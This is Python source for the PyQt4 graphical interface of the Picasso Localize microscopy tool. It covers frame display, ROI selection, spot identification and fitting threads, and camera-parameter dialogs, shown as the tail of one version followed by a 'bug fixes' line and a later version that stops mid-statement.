        self.view.scale(7 / 10, 7 / 10)
    def save_locs(self, path):
        """Write localizations plus provenance metadata to an HDF5 file."""
        localize_info = self.last_identification_info.copy()
        localize_info['Generated by'] = 'Picasso Localize'
        info = self.info + [localize_info]
        io.save_locs(path, self.locs, info)
    def save_locs_dialog(self):
        base, ext = os.path.splitext(self.movie_path)
        locs_path = base + '_locs.hdf5'
        path = QtGui.QFileDialog.getSaveFileName(self, 'Save localizations', locs_path, filter='*.hdf5')
        if path:
            self.save_locs(path)
    def localize(self):
        """Run identification and fitting back to back."""
        self.identify(fit_afterwards=True)
class IdentificationWorker(QtCore.QThread):
    """Background thread that identifies spots in every movie frame."""

    progressMade = QtCore.pyqtSignal(int, dict)
    finished = QtCore.pyqtSignal(dict, list, np.recarray, bool)

    def __init__(self, window, fit_afterwards):
        super().__init__()
        self.window = window
        self.movie = window.movie
        self.roi = window.view.roi
        self.parameters = window.parameters
        self.fit_afterwards = fit_afterwards

    def run(self):
        futures = localize.identify_async(self.movie, self.parameters, self.roi)
        pending = futures
        # Poll until every per-frame future is done, reporting progress
        # as the number of completed futures.
        while pending:
            completed, pending = wait(futures, 0.1)
            self.progressMade.emit(len(completed), self.parameters)
        results = [future.result() for future in futures]
        identifications = np.hstack(results).view(np.recarray)
        self.finished.emit(self.parameters, self.roi, identifications, self.fit_afterwards)
class FitWorker(QtCore.QThread):
    """Background thread that fits identified spots and reports progress."""

    progressMade = QtCore.pyqtSignal(int, int)
    finished = QtCore.pyqtSignal(np.recarray)

    def __init__(self, movie, camera_info, identifications, box):
        super().__init__()
        self.movie = movie
        self.camera_info = camera_info
        self.identifications = identifications
        self.box = box

    def run(self):
        fit_thread, fit_info = localize.fit_async(self.movie, self.camera_info,
                                                  self.identifications, self.box)
        # Forward progress every 100 ms while the fitting thread runs.
        while fit_thread.is_alive():
            self.progressMade.emit(fit_info.current, fit_info.n_spots)
            time.sleep(0.1)
        fit_thread.join()  # just in case...
        localizations = localize.locs_from_fit_info(fit_info, self.identifications, self.box)
        self.finished.emit(localizations)
if __name__ == '__main__':
    app = QtGui.QApplication(sys.argv)
    window = Window()
    window.show()

    def excepthook(exc_type, exc_value, exc_traceback):
        """Show uncaught exceptions in a dialog, then chain to the default hook."""
        message = ''.join(traceback.format_exception(exc_type, exc_value, exc_traceback))
        # QMessageBox.critical is a static convenience function: it shows the
        # dialog modally and returns the clicked StandardButton. The previous
        # code called .exec_() on that return value, which raised an
        # AttributeError inside the excepthook itself.
        QtGui.QMessageBox.critical(window, 'An error occured', message)
        sys.__excepthook__(exc_type, exc_value, exc_traceback)

    sys.excepthook = excepthook
    sys.exit(app.exec_())
bug fixes
#!/usr/bin/env python
"""
gui/localize
~~~~~~~~~~~~~~~~~~~~
Graphical user interface for localizing single molecules
:author: Joerg Schnitzbauer, 2015
"""
import os.path
import sys
import yaml
from PyQt4 import QtCore, QtGui
import time
import numpy as np
import traceback
from concurrent.futures import wait
_this_file = os.path.abspath(__file__)
_this_directory = os.path.dirname(_this_file)
_parent_directory = os.path.dirname(_this_directory)
sys.path.insert(0, _parent_directory)    # We want to use the local picasso instead the system-wide
from picasso import io, localize
# 8-bit grayscale color table used to render movie frames as indexed images.
CMAP_GRAYSCALE = [QtGui.qRgb(_, _, _) for _ in range(256)]
# Defaults applied to the identification widgets in ParametersDialog.
DEFAULT_PARAMETERS = {'Box Size': 7, 'Minimum LGM': 5000}
class RubberBand(QtGui.QRubberBand):
    """Selection rubber band rendered as a plain one-pixel blue outline."""
    def __init__(self, parent):
        super().__init__(QtGui.QRubberBand.Rectangle, parent)
    def paintEvent(self, event):
        painter = QtGui.QPainter(self)
        color = QtGui.QColor(QtCore.Qt.blue)
        painter.setPen(QtGui.QPen(color))
        rect = event.rect()
        # Shrink by one pixel so the outline stays inside the widget area.
        rect.setHeight(rect.height() - 1)
        rect.setWidth(rect.width() - 1)
        painter.drawRect(rect)
class View(QtGui.QGraphicsView):
    """ The central widget which shows `Scene` objects of individual frames.

    Left-drag selects a rectangular ROI (shown with a rubber band);
    right-drag pans; the mouse wheel zooms.
    """
    def __init__(self, window):
        super().__init__(window)
        self.window = window
        self.setAcceptDrops(True)
        # True while the right mouse button is held down for panning.
        self.pan = False
        self.hscrollbar = self.horizontalScrollBar()
        self.vscrollbar = self.verticalScrollBar()
        self.rubberband = RubberBand(self)
        # ROI as [[y0, x0], [y1, x1]] in scene coordinates, or None.
        self.roi = None
    def mousePressEvent(self, event):
        # Left button starts an ROI selection; right button starts panning.
        if event.button() == QtCore.Qt.LeftButton:
            self.roi_origin = QtCore.QPoint(event.pos())
            self.rubberband.setGeometry(QtCore.QRect(self.roi_origin, QtCore.QSize()))
            self.rubberband.show()
        elif event.button() == QtCore.Qt.RightButton:
            self.pan = True
            self.pan_start_x = event.x()
            self.pan_start_y = event.y()
            self.setCursor(QtCore.Qt.ClosedHandCursor)
            event.accept()
        else:
            event.ignore()
    def mouseMoveEvent(self, event):
        if event.buttons() == QtCore.Qt.LeftButton:
            self.rubberband.setGeometry(QtCore.QRect(self.roi_origin, event.pos()))
        if self.pan:
            # Scroll opposite to the cursor movement so the image follows the drag.
            self.hscrollbar.setValue(self.hscrollbar.value() - event.x() + self.pan_start_x)
            self.vscrollbar.setValue(self.vscrollbar.value() - event.y() + self.pan_start_y)
            self.pan_start_x = event.x()
            self.pan_start_y = event.y()
            event.accept()
        else:
            event.ignore()
    def mouseReleaseEvent(self, event):
        if event.button() == QtCore.Qt.LeftButton:
            self.roi_end = QtCore.QPoint(event.pos())
            dx = abs(self.roi_end.x() - self.roi_origin.x())
            dy = abs(self.roi_end.y() - self.roi_origin.y())
            # Drags smaller than 10 px in either direction clear the ROI.
            if dx < 10 or dy < 10:
                self.roi = None
                self.rubberband.hide()
            else:
                roi_points = (self.mapToScene(self.roi_origin), self.mapToScene(self.roi_end))
                # Stored as [y, x] pairs, matching the (frame, y, x) movie layout.
                self.roi = list([[int(_.y()), int(_.x())] for _ in roi_points])
            self.window.draw_frame()
        elif event.button() == QtCore.Qt.RightButton:
            self.pan = False
            self.setCursor(QtCore.Qt.ArrowCursor)
            event.accept()
        else:
            event.ignore()
    def wheelEvent(self, event):
        """ Implements zooming with the mouse wheel """
        scale = 1.008 ** (-event.delta())
        self.scale(scale, scale)
class Scene(QtGui.QGraphicsScene):
    """ Scenes render individual frames and can be displayed in a `View` widget.

    Supports drag-and-drop of .raw movies and .yaml parameter files.
    """
    def __init__(self, window, parent=None):
        super().__init__(parent)
        self.window = window
        # Keep accepting the drag while the cursor moves over the scene.
        self.dragMoveEvent = self.dragEnterEvent
    def path_from_drop(self, event):
        """Return (path, extension) of the first URL carried by a drop event."""
        url = event.mimeData().urls()[0]
        path = url.toLocalFile()
        base, extension = os.path.splitext(path)
        return path, extension
    def drop_has_valid_url(self, event):
        """Return True if the drop carries a local .raw or .yaml file URL."""
        if not event.mimeData().hasUrls():
            return False
        path, extension = self.path_from_drop(event)
        return extension.lower() in ['.raw', '.yaml']
    def dragEnterEvent(self, event):
        if self.drop_has_valid_url(event):
            event.accept()
        else:
            event.ignore()
    def dropEvent(self, event):
        """ Loads raw movies or yaml parameters when dropped into the scene """
        path, extension = self.path_from_drop(event)
        # Compare case-insensitively: drop_has_valid_url lower-cases the
        # extension, so e.g. 'MOVIE.RAW' is accepted on drag-enter and must
        # be handled here as well (previously it was silently ignored).
        extension = extension.lower()
        if extension == '.raw':
            self.window.open(path)
        elif extension == '.yaml':
            self.window.load_parameters(path)
class FitMarker(QtGui.QGraphicsItemGroup):
    """Green 'X' marker drawn at a fitted localization position."""
    def __init__(self, x, y, size, parent=None):
        super().__init__(parent)
        L = size/2
        # Two crossing diagonals of a size-by-size square centered on (x, y).
        line1 = QtGui.QGraphicsLineItem(x-L, y-L, x+L, y+L)
        line1.setPen(QtGui.QPen(QtGui.QColor(0, 255, 0)))
        self.addToGroup(line1)
        line2 = QtGui.QGraphicsLineItem(x-L, y+L, x+L, y-L)
        line2.setPen(QtGui.QPen(QtGui.QColor(0, 255, 0)))
        self.addToGroup(line2)
class OddSpinBox(QtGui.QSpinBox):
    """ A spinbox that allows only odd numbers """
    def __init__(self, parent=None):
        super().__init__(parent)
        # Stepping by two keeps arrow/keyboard steps on odd values.
        self.setSingleStep(2)
        self.valueChanged.connect(self.on_value_changed)
    def on_value_changed(self, value):
        # Values typed in directly are bumped up to the next odd number.
        if value % 2 == 0:
            self.setValue(value + 1)
class ParametersDialog(QtGui.QDialog):
    """ The dialog showing analysis parameters """

    def __init__(self, parent=None):
        super().__init__(parent)
        # `parent` is the main Window; kept so changes can trigger redraws.
        self.window = parent
        self.setWindowTitle('Parameters')
        self.resize(300, 0)
        self.setModal(False)
        vbox = QtGui.QVBoxLayout(self)
        identification_groupbox = QtGui.QGroupBox('Identification')
        vbox.addWidget(identification_groupbox)
        identification_grid = QtGui.QGridLayout(identification_groupbox)
        # Box Size
        identification_grid.addWidget(QtGui.QLabel('Box side length:'), 0, 0)
        self.box_spinbox = OddSpinBox()
        self.box_spinbox.setValue(DEFAULT_PARAMETERS['Box Size'])
        self.box_spinbox.valueChanged.connect(self.on_box_changed)
        identification_grid.addWidget(self.box_spinbox, 0, 1)
        # Minimum LGM
        identification_grid.addWidget(QtGui.QLabel('Minimum LGM:'), 1, 0)
        self.mlgm_spinbox = QtGui.QSpinBox()
        self.mlgm_spinbox.setRange(0, 999999)
        self.mlgm_spinbox.setValue(DEFAULT_PARAMETERS['Minimum LGM'])
        self.mlgm_spinbox.setKeyboardTracking(False)
        self.mlgm_spinbox.valueChanged.connect(self.on_mlgm_spinbox_changed)
        identification_grid.addWidget(self.mlgm_spinbox, 1, 1)
        # Slider
        self.mlgm_slider = QtGui.QSlider()
        self.mlgm_slider.setOrientation(QtCore.Qt.Horizontal)
        self.mlgm_slider.setRange(0, 10000)
        self.mlgm_slider.setValue(DEFAULT_PARAMETERS['Minimum LGM'])
        self.mlgm_slider.setSingleStep(1)
        self.mlgm_slider.setPageStep(20)
        self.mlgm_slider.valueChanged.connect(self.on_mlgm_slider_changed)
        identification_grid.addWidget(self.mlgm_slider, 2, 0, 1, 2)
        hbox = QtGui.QHBoxLayout()
        identification_grid.addLayout(hbox, 3, 0, 1, 2)
        # Min SpinBox (lower bound of the slider range)
        self.mlgm_min_spinbox = QtGui.QSpinBox()
        self.mlgm_min_spinbox.setRange(0, 999999)
        self.mlgm_min_spinbox.setKeyboardTracking(False)
        self.mlgm_min_spinbox.setValue(0)
        self.mlgm_min_spinbox.valueChanged.connect(self.on_mlgm_min_changed)
        hbox.addWidget(self.mlgm_min_spinbox)
        hbox.addStretch(1)
        # Max SpinBox (upper bound of the slider range)
        self.mlgm_max_spinbox = QtGui.QSpinBox()
        self.mlgm_max_spinbox.setKeyboardTracking(False)
        self.mlgm_max_spinbox.setRange(0, 999999)
        self.mlgm_max_spinbox.setValue(10000)
        self.mlgm_max_spinbox.valueChanged.connect(self.on_mlgm_max_changed)
        hbox.addWidget(self.mlgm_max_spinbox)
        self.preview_checkbox = QtGui.QCheckBox('Preview')
        self.preview_checkbox.setTristate(False)
        # self.preview_checkbox.setChecked(True)
        self.preview_checkbox.stateChanged.connect(self.on_preview_changed)
        identification_grid.addWidget(self.preview_checkbox, 4, 0)
        fit_groupbox = QtGui.QGroupBox('Fitting')
        vbox.addWidget(fit_groupbox)
        fit_grid = QtGui.QGridLayout(fit_groupbox)
        # Camera
        fit_grid.addWidget(QtGui.QLabel('Camera:'), 0, 0)
        self.camera_combo = QtGui.QComboBox()
        self.camera_combo.currentIndexChanged.connect(self.on_camera_changed)
        fit_grid.addWidget(self.camera_combo, 0, 1)
        self.em_checkbox = QtGui.QCheckBox('Electron Multiplying')
        self.em_checkbox.toggled.connect(self.update_readmodes)
        fit_grid.addWidget(self.em_checkbox, 1, 1)
        fit_grid.addWidget(QtGui.QLabel('EM Real Gain:'), 2, 0)
        self.gain_spinbox = QtGui.QSpinBox()
        self.gain_spinbox.setRange(1, 1000)
        fit_grid.addWidget(self.gain_spinbox, 2, 1)
        fit_grid.addWidget(QtGui.QLabel('Readout Mode:'), 3, 0)
        self.readmode_combo = QtGui.QComboBox()
        self.readmode_combo.currentIndexChanged.connect(self.update_preamps)
        fit_grid.addWidget(self.readmode_combo, 3, 1)
        fit_grid.addWidget(QtGui.QLabel('Pre-Amp Gain:'), 4, 0)
        self.preamp_combo = QtGui.QComboBox()
        fit_grid.addWidget(self.preamp_combo, 4, 1)
        fit_grid.addWidget(QtGui.QLabel('Excitation Wavelength:'), 5, 0)
        self.excitation_combo = QtGui.QComboBox()
        fit_grid.addWidget(self.excitation_combo, 5, 1)
        # Populating the camera list last triggers on_camera_changed, which
        # cascades into the readout-mode / pre-amp / wavelength combos.
        self.camera_combo.addItems([''] + sorted(list(localize.CONFIG['Cameras'].keys())))

    def on_camera_changed(self, index):
        """Refresh readout modes and excitation wavelengths for the camera."""
        self.update_readmodes(index)
        self.excitation_combo.clear()
        camera = self.camera_combo.currentText()
        if camera:
            wavelengths = sorted(list(localize.CONFIG['Cameras'][camera]['Quantum Efficiency'].keys()))
            wavelengths = [str(_) for _ in wavelengths]
            self.excitation_combo.addItems([''] + wavelengths)

    def update_readmodes(self, index):
        """Fill the readout-mode combo from the camera's sensitivity table."""
        self.readmode_combo.clear()
        camera = self.camera_combo.currentText()
        if camera:
            # Readout modes are only configured for EMCCD sensors.
            if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
                em = self.em_checkbox.isChecked()
                self.readmode_combo.addItems([''] + sorted(list(localize.CONFIG['Cameras'][camera]['Sensitivity'][em].keys())))

    def update_preamps(self, index):
        """Fill the pre-amp gain combo for the selected readout mode."""
        self.preamp_combo.clear()
        camera = self.camera_combo.currentText()
        if camera:
            if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
                em = self.em_checkbox.isChecked()
                readmode = self.readmode_combo.currentText()
                if readmode:
                    # Pre-amp settings are shown 1-based to the user.
                    preamps = range(len(localize.CONFIG['Cameras'][camera]['Sensitivity'][em][readmode]))
                    preamps = [''] + [str(_ + 1) for _ in list(preamps)]
                    self.preamp_combo.addItems(preamps)

    def on_box_changed(self, value):
        """Box size changed: invalidate previous identifications/fits."""
        self.window.on_parameters_changed()

    def on_mlgm_spinbox_changed(self, value):
        """Sync the slider with a typed value, widening its range if needed."""
        if value < self.mlgm_slider.minimum():
            self.mlgm_min_spinbox.setValue(value)
        if value > self.mlgm_slider.maximum():
            self.mlgm_max_spinbox.setValue(value)
        self.mlgm_slider.setValue(value)

    def on_mlgm_slider_changed(self, value):
        """Mirror the slider into the spinbox; live-update in preview mode."""
        self.mlgm_spinbox.setValue(value)
        if self.preview_checkbox.isChecked():
            self.window.on_parameters_changed()

    def on_mlgm_min_changed(self, value):
        self.mlgm_slider.setMinimum(value)

    def on_mlgm_max_changed(self, value):
        self.mlgm_slider.setMaximum(value)

    def on_preview_changed(self, state):
        """Redraw the frame with or without the identification preview."""
        self.window.draw_frame()

    def set_camera_parameters(self, parameters):
        """Restore the fitting widgets from a movie's metadata dict.

        Missing keys leave the corresponding widget at its blank default
        (combo index 0).
        """
        self.camera_combo.setCurrentIndex(0)
        if 'Camera' in parameters:
            camera = parameters['Camera']
            for index in range(self.camera_combo.count()):
                if self.camera_combo.itemText(index) == camera:
                    self.camera_combo.setCurrentIndex(index)
                    break
        if 'Electron Multiplying' in parameters:
            self.em_checkbox.setChecked(parameters['Electron Multiplying'])
            if parameters['Electron Multiplying']:
                if 'EM Real Gain' in parameters:
                    self.gain_spinbox.setValue(parameters['EM Real Gain'])
        self.readmode_combo.setCurrentIndex(0)
        if 'Readout Mode' in parameters:
            for index in range(self.readmode_combo.count()):
                if self.readmode_combo.itemText(index) == parameters['Readout Mode']:
                    self.readmode_combo.setCurrentIndex(index)
                    break
        self.preamp_combo.setCurrentIndex(0)
        if 'Pre-Amp Gain' in parameters:
            for index in range(self.preamp_combo.count()):
                if self.preamp_combo.itemText(index) == str(parameters['Pre-Amp Gain']):
                    self.preamp_combo.setCurrentIndex(index)
                    break
        self.excitation_combo.setCurrentIndex(0)
        if 'Excitation Wavelength' in parameters:
            # Index 0 is the blank entry; the remaining items parse as ints.
            for index in range(1, self.excitation_combo.count()):
                if int(self.excitation_combo.itemText(index)) == parameters['Excitation Wavelength']:
                    self.excitation_combo.setCurrentIndex(index)
                    break

    def get_camera_parameters(self):
        """Collect the camera settings needed for fitting.

        Raises:
            ValueError: if no excitation wavelength has been selected.
        """
        # NOTE(review): an empty camera selection reaches the CONFIG lookup
        # below and would raise KeyError -- confirm callers prevent this.
        camera = self.camera_combo.currentText()
        parameters = {'Camera': self.camera_combo.currentText()}
        if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
            parameters['Electron Multiplying'] = self.em_checkbox.isChecked()
            parameters['EM Real Gain'] = self.gain_spinbox.value()
            parameters['Readout Mode'] = self.readmode_combo.currentText()
            parameters['Pre-Amp Gain'] = int(self.preamp_combo.currentText())
        elif localize.CONFIG['Cameras'][camera]['Sensor'] == 'sCMOS':
            pass
        try:
            parameters['Excitation Wavelength'] = int(self.excitation_combo.currentText())
        except ValueError:
            raise ValueError('You must set the wavelength!')
        return parameters
class ContrastDialog(QtGui.QDialog):
    """Dialog for manual or automatic black/white contrast levels."""

    def __init__(self, window):
        super().__init__(window)
        self.window = window
        self.setWindowTitle('Contrast')
        self.resize(200, 0)
        self.setModal(False)
        grid = QtGui.QGridLayout(self)
        black_label = QtGui.QLabel('Black:')
        grid.addWidget(black_label, 0, 0)
        self.black_spinbox = QtGui.QSpinBox()
        self.black_spinbox.setKeyboardTracking(False)
        self.black_spinbox.setRange(0, 999999)
        self.black_spinbox.valueChanged.connect(self.on_contrast_changed)
        grid.addWidget(self.black_spinbox, 0, 1)
        white_label = QtGui.QLabel('White:')
        grid.addWidget(white_label, 1, 0)
        self.white_spinbox = QtGui.QSpinBox()
        self.white_spinbox.setKeyboardTracking(False)
        self.white_spinbox.setRange(0, 999999)
        self.white_spinbox.valueChanged.connect(self.on_contrast_changed)
        grid.addWidget(self.white_spinbox, 1, 1)
        self.auto_checkbox = QtGui.QCheckBox('Auto')
        self.auto_checkbox.setTristate(False)
        self.auto_checkbox.setChecked(True)
        self.auto_checkbox.stateChanged.connect(self.on_auto_changed)
        grid.addWidget(self.auto_checkbox, 2, 0, 1, 2)
        # Guard flag so the spin boxes can be updated programmatically
        # without on_contrast_changed switching auto mode off.
        self.silent_contrast_change = False

    def change_contrast_silently(self, black, white):
        """Set both contrast levels without triggering auto-off or redraws."""
        self.silent_contrast_change = True
        self.black_spinbox.setValue(black)
        self.white_spinbox.setValue(white)
        self.silent_contrast_change = False

    def on_contrast_changed(self, value):
        """User edited a level: leave auto mode and redraw the frame."""
        if not self.silent_contrast_change:
            self.auto_checkbox.setChecked(False)
            self.window.draw_frame()

    def on_auto_changed(self, state):
        """Re-enable auto contrast based on the currently shown frame."""
        if state:
            movie = self.window.movie
            # Bug fix: toggling 'Auto' before a movie was loaded used to
            # crash with a TypeError when indexing None.
            if movie is not None:
                frame_number = self.window.current_frame_number
                frame = movie[frame_number]
                self.change_contrast_silently(frame.min(), frame.max())
                self.window.draw_frame()
class Window(QtGui.QMainWindow):
    """ The main window """

    def __init__(self):
        super().__init__()
        # Init GUI
        self.setWindowTitle('Picasso: Localize')
        this_directory = os.path.dirname(os.path.realpath(__file__))
        icon_path = os.path.join(this_directory, 'localize.ico')
        icon = QtGui.QIcon(icon_path)
        self.setWindowIcon(icon)
        self.resize(768, 768)
        self.parameters_dialog = ParametersDialog(self)
        self.contrast_dialog = ContrastDialog(self)
        self.init_menu_bar()
        self.view = View(self)
        self.setCentralWidget(self.view)
        self.scene = Scene(self)
        self.view.setScene(self.scene)
        self.status_bar = self.statusBar()
        self.status_bar_frame_indicator = QtGui.QLabel()
        self.status_bar.addPermanentWidget(self.status_bar_frame_indicator)
        #: Holds the current movie as a numpy memmap in the format (frame, y, x)
        self.movie = None
        #: A dictionary of analysis parameters used for the last operation
        self.last_identification_info = None
        #: A numpy.recarray of identifcations with fields frame, x and y
        self.identifications = None
        # True once identifications exist for the current parameters.
        self.ready_for_fit = False
        # numpy.recarray of fitted localizations, or None before any fit ran.
        self.locs = None

    def init_menu_bar(self):
        """Build the File/View/Analyze menus and their keyboard shortcuts."""
        menu_bar = self.menuBar()
        """ File """
        file_menu = menu_bar.addMenu('File')
        open_action = file_menu.addAction('Open movie')
        open_action.setShortcut('Ctrl+O')
        open_action.triggered.connect(self.open_file_dialog)
        file_menu.addAction(open_action)
        save_action = file_menu.addAction('Save localizations')
        save_action.setShortcut('Ctrl+S')
        save_action.triggered.connect(self.save_locs_dialog)
        file_menu.addAction(save_action)
        file_menu.addSeparator()
        # open_parameters_action = file_menu.addAction('Load parameters')
        # open_parameters_action.setShortcut('Ctrl+Shift+O')
        # open_parameters_action.triggered.connect(self.open_parameters)
        # file_menu.addAction(open_parameters_action)
        # save_parameters_action = file_menu.addAction('Save parameters')
        # save_parameters_action.setShortcut('Ctrl+Shift+S')
        # save_parameters_action.triggered.connect(self.save_parameters)
        # file_menu.addAction(save_parameters_action)
        """ View """
        view_menu = menu_bar.addMenu('View')
        previous_frame_action = view_menu.addAction('Previous frame')
        previous_frame_action.setShortcut('Left')
        previous_frame_action.triggered.connect(self.previous_frame)
        view_menu.addAction(previous_frame_action)
        next_frame_action = view_menu.addAction('Next frame')
        next_frame_action.setShortcut('Right')
        next_frame_action.triggered.connect(self.next_frame)
        view_menu.addAction(next_frame_action)
        view_menu.addSeparator()
        first_frame_action = view_menu.addAction('First frame')
        first_frame_action.setShortcut('Home')
        first_frame_action.triggered.connect(self.first_frame)
        view_menu.addAction(first_frame_action)
        last_frame_action = view_menu.addAction('Last frame')
        last_frame_action.setShortcut('End')
        last_frame_action.triggered.connect(self.last_frame)
        view_menu.addAction(last_frame_action)
        go_to_frame_action = view_menu.addAction('Go to frame')
        go_to_frame_action.setShortcut('Ctrl+G')
        go_to_frame_action.triggered.connect(self.to_frame)
        view_menu.addAction(go_to_frame_action)
        view_menu.addSeparator()
        zoom_in_action = view_menu.addAction('Zoom in')
        zoom_in_action.setShortcuts(['Ctrl++', 'Ctrl+='])
        zoom_in_action.triggered.connect(self.zoom_in)
        view_menu.addAction(zoom_in_action)
        zoom_out_action = view_menu.addAction('Zoom out')
        zoom_out_action.setShortcut('Ctrl+-')
        zoom_out_action.triggered.connect(self.zoom_out)
        view_menu.addAction(zoom_out_action)
        fit_in_view_action = view_menu.addAction('Fit image to window')
        fit_in_view_action.setShortcut('Ctrl+W')
        fit_in_view_action.triggered.connect(self.fit_in_view)
        view_menu.addAction(fit_in_view_action)
        view_menu.addSeparator()
        display_settings_action = view_menu.addAction('Contrast')
        display_settings_action.setShortcut('Ctrl+C')
        display_settings_action.triggered.connect(self.contrast_dialog.show)
        view_menu.addAction(display_settings_action)
        """ Analyze """
        analyze_menu = menu_bar.addMenu('Analyze')
        parameters_action = analyze_menu.addAction('Parameters')
        parameters_action.setShortcut('Ctrl+P')
        parameters_action.triggered.connect(self.parameters_dialog.show)
        analyze_menu.addAction(parameters_action)
        analyze_menu.addSeparator()
        identify_action = analyze_menu.addAction('Identify')
        identify_action.setShortcut('Ctrl+I')
        identify_action.triggered.connect(self.identify)
        analyze_menu.addAction(identify_action)
        fit_action = analyze_menu.addAction('Fit')
        fit_action.setShortcut('Ctrl+F')
        fit_action.triggered.connect(self.fit)
        analyze_menu.addAction(fit_action)
        localize_action = analyze_menu.addAction('Localize (Identify && Fit)')
        localize_action.setShortcut('Ctrl+L')
        localize_action.triggered.connect(self.localize)
        analyze_menu.addAction(localize_action)

    def open_file_dialog(self):
        """Ask for a .raw movie and open it."""
        path = QtGui.QFileDialog.getOpenFileName(self, 'Open image sequence', filter='*.raw')
        if path:
            self.open(path)

    def open(self, path):
        """Memory-map the raw movie at `path` and reset analysis state."""
        try:
            self.movie, self.info = io.load_raw(path, memory_map=True)
            self.movie_path = path
            # A new movie invalidates any previous analysis results.
            self.identifications = None
            self.locs = None
            self.ready_for_fit = False
            self.set_frame(0)
            self.fit_in_view()
            self.parameters_dialog.set_camera_parameters(self.info[0])
        except FileNotFoundError:
            pass  # TODO send a message

    def previous_frame(self):
        """Step one frame back, if possible."""
        if self.movie is not None:
            if self.current_frame_number > 0:
                self.set_frame(self.current_frame_number - 1)

    def next_frame(self):
        """Step one frame forward, if possible."""
        if self.movie is not None:
            if self.current_frame_number + 1 < self.info[0]['Frames']:
                self.set_frame(self.current_frame_number + 1)

    def first_frame(self):
        if self.movie is not None:
            self.set_frame(0)

    def last_frame(self):
        if self.movie is not None:
            self.set_frame(self.info[0]['Frames'] - 1)

    def to_frame(self):
        """Jump to a user-chosen frame (dialog is 1-based, storage 0-based)."""
        if self.movie is not None:
            frames = self.info[0]['Frames']
            number, ok = QtGui.QInputDialog.getInt(self, 'Go to frame', 'Frame number:', self.current_frame_number+1, 1, frames)
            if ok:
                self.set_frame(number - 1)

    def set_frame(self, number):
        """Make frame `number` current, update contrast and redraw."""
        self.current_frame_number = number
        if self.contrast_dialog.auto_checkbox.isChecked():
            black = self.movie[number].min()
            white = self.movie[number].max()
            self.contrast_dialog.change_contrast_silently(black, white)
        self.draw_frame()
        self.status_bar_frame_indicator.setText('{:,}/{:,}'.format(number + 1, self.info[0]['Frames']))

    def draw_frame(self):
        """Render the current frame plus identification/fit overlays."""
        if self.movie is not None:
            frame = self.movie[self.current_frame_number]
            frame = frame.astype('float32')
            # Scale pixel values to [0, 255] for 8-bit grayscale display.
            if self.contrast_dialog.auto_checkbox.isChecked():
                frame -= frame.min()
                frame /= frame.max()
            else:
                frame -= self.contrast_dialog.black_spinbox.value()
                # NOTE(review): dividing by the white level (not white - black)
                # compresses the upper range -- confirm whether intended.
                frame /= self.contrast_dialog.white_spinbox.value()
            frame *= 255.0
            frame = np.maximum(frame, 0)
            frame = np.minimum(frame, 255)
            frame = frame.astype('uint8')
            height, width = frame.shape
            image = QtGui.QImage(frame.data, width, height, width, QtGui.QImage.Format_Indexed8)
            image.setColorTable(CMAP_GRAYSCALE)
            pixmap = QtGui.QPixmap.fromImage(image)
            # A fresh scene drops all overlay items from the previous draw.
            self.scene = Scene(self)
            self.scene.addPixmap(pixmap)
            self.view.setScene(self.scene)
            if self.ready_for_fit:
                # Final identifications for the displayed frame (yellow).
                identifications_frame = self.identifications[self.identifications.frame == self.current_frame_number]
                box = self.last_identification_info['Box Size']
                self.draw_identifications(identifications_frame, box, QtGui.QColor('yellow'))
            else:
                if self.parameters_dialog.preview_checkbox.isChecked():
                    # Live preview with the current (unsaved) parameters (red).
                    identifications_frame = localize.identify_by_frame_number(self.movie,
                                                                              self.parameters,
                                                                              self.current_frame_number,
                                                                              self.view.roi)
                    box = self.parameters['Box Size']
                    self.status_bar.showMessage('Found {:,} spots in current frame.'.format(len(identifications_frame)))
                    self.draw_identifications(identifications_frame, box, QtGui.QColor('red'))
                else:
                    self.status_bar.showMessage('')
            if self.locs is not None:
                # Cross markers at fitted positions (+0.5 centers on pixels).
                locs_frame = self.locs[self.locs.frame == self.current_frame_number]
                for loc in locs_frame:
                    self.scene.addItem(FitMarker(loc.x+0.5, loc.y+0.5, 1))

    def draw_identifications(self, identifications, box, color):
        """Draw a box-sized rectangle around each identified spot."""
        box_half = int(box / 2)
        for identification in identifications:
            x = identification.x
            y = identification.y
            self.scene.addRect(x - box_half, y - box_half, box, box, color)

    def open_parameters(self):
        """Ask for a .yaml parameter file and load it."""
        path = QtGui.QFileDialog.getOpenFileName(self, 'Open parameters', filter='*.yaml')
        if path:
            self.load_parameters(path)

    def load_parameters(self, path):
        """Load Box Size / Minimum LGM from a yaml file into the dialog."""
        with open(path, 'r') as file:
            parameters = yaml.load(file)
            self.parameters_dialog.box_spinbox.setValue(parameters['Box Size'])
            self.parameters_dialog.mlgm_spinbox.setValue(parameters['Minimum LGM'])
            self.status_bar.showMessage('Parameter file {} loaded.'.format(path))

    def save_parameters(self):
        """Ask for a target path and dump the current parameters as yaml."""
        path = QtGui.QFileDialog.getSaveFileName(self, 'Save parameters', filter='*.yaml')
        if path:
            with open(path, 'w') as file:
                yaml.dump(self.parameters, file, default_flow_style=False)

    @property
    def parameters(self):
        """The current identification parameters, read from the dialog."""
        return {'Box Size': self.parameters_dialog.box_spinbox.value(),
                'Minimum LGM': self.parameters_dialog.mlgm_slider.value()}

    def on_parameters_changed(self):
        """Invalidate previous results and redraw (called by the dialog)."""
        self.locs = None
        self.ready_for_fit = False
        self.draw_frame()

    def identify(self, fit_afterwards=False):
        """Start spot identification on a worker thread."""
        if self.movie is not None:
            self.status_bar.showMessage('Preparing identification...')
            self.identificaton_worker = IdentificationWorker(self, fit_afterwards)
            self.identificaton_worker.progressMade.connect(self.on_identify_progress)
            self.identificaton_worker.finished.connect(self.on_identify_finished)
            self.identificaton_worker.start()

    def on_identify_progress(self, frame_number, parameters):
        """Show identification progress in the status bar."""
        n_frames = self.info[0]['Frames']
        box = parameters['Box Size']
        mmlg = parameters['Minimum LGM']
        message = 'Identifying in frame {:,}/{:,} (Box Size: {:,}; Minimum LGM: {:,})...'.format(frame_number,
                                                                                                n_frames,
                                                                                                box,
                                                                                                mmlg)
        self.status_bar.showMessage(message)

    def on_identify_finished(self, parameters, roi, identifications, fit_afterwards):
        """Store identification results and optionally chain into fitting."""
        if len(identifications):
            self.locs = None
            self.last_identification_info = parameters.copy()
            self.last_identification_info['ROI'] = roi
            n_identifications = len(identifications)
            box = parameters['Box Size']
            mmlg = parameters['Minimum LGM']
            message = 'Identified {:,} spots (Box Size: {:,}; Minimum LGM: {:,}). Ready for fit.'.format(n_identifications,
